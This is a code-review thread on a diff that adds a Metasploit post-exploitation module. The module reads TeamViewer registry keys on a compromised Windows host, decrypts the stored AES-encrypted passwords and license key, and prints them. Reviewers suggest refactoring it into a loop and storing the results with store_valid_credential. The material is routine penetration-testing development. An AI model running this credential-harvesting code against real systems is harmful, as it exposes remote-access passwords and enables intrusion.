modules/post/windows/gather/credentials/teamviewer_passwords.rb

```diff
@@ -0,0 +1,143 @@
+        'SessionTypes'  => [ 'meterpreter' ]
+      ))
+  end
+
+  def app_list
+    results = ""
+    keys = [
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version8", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version9", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version10", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version11", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version12", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version13", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version14", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version15", "Version" ],
+      [ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer", "Version" ],
+      [ "HKLM\\SOFTWARE\\TeamViewer\\Temp", "SecurityPasswordExported" ],
+      [ "HKLM\\SOFTWARE\\TeamViewer", "Version" ],
+    ]
+
+    keys.each do |keyx86|
+
+      #parent key
+      p = keyx86[0,1].join
+
+      #child key
+      c = keyx86[1,1].join
+
+      key      = nil
+      keychunk = registry_getvaldata(p, c)
+      key      = keychunk.unpack("C*") if not keychunk.nil?
+
+      optpass  = registry_getvaldata(p, "OptionsPasswordAES")
+      secpass  = registry_getvaldata(p, "SecurityPasswordAES")
+      secpasse = registry_getvaldata(p, "SecurityPasswordExported")
+      servpass = registry_getvaldata(p, "ServerPasswordAES")
+      proxpass = registry_getvaldata(p, "ProxyPasswordAES")
+      license  = registry_getvaldata(p, "LicenseKeyAES")
+
+      if not optpass.nil?
+        decvalue = decrypt(optpass)
+        if not decvalue.nil?
+          print_good("Found Options Password: #{decvalue}")
+          results << "Options:#{decvalue}\n"
+        end
+      end
+      if not secpass.nil?
+        decvalue = decrypt(secpass)
+        if not decvalue.nil?
+          print_good("Found Security Password: #{decvalue}")
+          results << "Security:#{decvalue}\n"
+        end
+      end
+      if not secpasse.nil?
+        decvalue = decrypt(secpasse)
+        if not decvalue.nil?
+          print_good("Found Security Password Exported: #{decvalue}")
+          results << "SecurityE:#{decvalue}\n"
+        end
+      end
+      if not servpass.nil?
+        decvalue = decrypt(servpass)
+        if not decvalue.nil?
+          print_good("Found Server Password: #{decvalue}")
+          results << "Server:#{decvalue}\n"
+        end
+      end
+      if not proxpass.nil?
+        decvalue = decrypt(proxpass)
+        if not decvalue.nil?
+          print_good("Found Proxy Password: #{decvalue}")
+          results << "Proxy:#{decvalue}\n"
+        end
+      end
+      if not license.nil?
+        decvalue = decrypt(license)
+        if not decvalue.nil?
+          print_good("Found License Key: #{decvalue}")
+          results << "License:#{decvalue}\n"
+        end
+      end
```

Comment:
This whole block looks like a good use case for a loop. You could do something like the following to avoid repeating yourself so many times.

```
locations = [
  { :value => 'OptionsPasswordAES', :description => 'Options Password' },
  ....
]

locations.each do |location|
  secret = registry_getvaldata(p, location[:value])
  next if secret.nil?
  plaintext = decrypt(secret)
  next if plaintext.nil?
  print_good("Found #{location[:description]}: #{plaintext}")
end
```

You could use the same string for the `results` string you're building or you could add another key to the location hash, but the gist is the same.


If any of these passwords make sense to check for elsewhere they should be reported with `report_cred`. This will allow them to be stored in the database, thus making them available for more advanced workflows.

Reply:
Forgot to mention, with this approach `locations` should be defined outside the loop.

Reply:
After talking with the team, I was informed that `store_valid_credential` should be used instead of `report_cred`.

The usage should look like:
`store_valid_credential(user:nil, private: password, private_type: :password, service_data: {last_attempted_at: nil, service_name: 'teamviewer', status: Metasploit::Model::Login::Status::UNTRIED})`

Reply:
Thank you for this, it makes the module so much cleaner.